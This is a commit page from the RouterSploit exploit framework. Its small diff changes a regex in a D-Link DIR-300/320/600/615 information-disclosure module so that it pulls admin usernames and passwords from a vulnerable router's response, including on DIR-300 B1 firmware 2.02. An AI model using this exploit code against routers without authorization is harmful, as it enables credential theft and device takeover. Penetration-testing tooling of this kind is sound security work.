Update dir_300_320_600_615_info_disclosure.py (#388)

DIR-300 B1 with firmware 2.02 may have '\nuser' after admin password.

Update dir_300_320_600_615_info_disclosure.py (#388)
DIR-300 B1 with firmware 2.02 may have '\nuser' after admin password.
7aef97f9 · Maccheroni · Marcin Bury · 822deeba · 7aef97f9
Commit 7aef97f9 authored May 07, 2018 by Maccheroni Committed by Marcin Bury May 07, 2018
Hide whitespace changes
Inline Side-by-side

Showing with 2 additions and 2 deletions

dir_300_320_600_615_info_disclosure.py ...oits/routers/dlink/dir_300_320_600_615_info_disclosure.py +2 -2

No files found.
--- a/routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py
+++ b/routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py
@@ -35,7 +35,7 @@ class Exploit(HTTPClient):
        if response is None:
            return
-        creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
+        creds = re.findall("\n\t\t\t(.+?):(.+?)(?:\n\n\t\t\t|\nuser)", response.text)
        if len(creds):
            print_success("Credentials found!")
@@ -53,7 +53,7 @@ class Exploit(HTTPClient):
        if response is None:
            return False  # target is not vulnerable
-        creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
+        creds = re.findall("\n\t\t\t(.+?):(.+?)(?:\n\n\t\t\t|\nuser)", response.text)
        if len(creds):
            return True  # target is vulnerable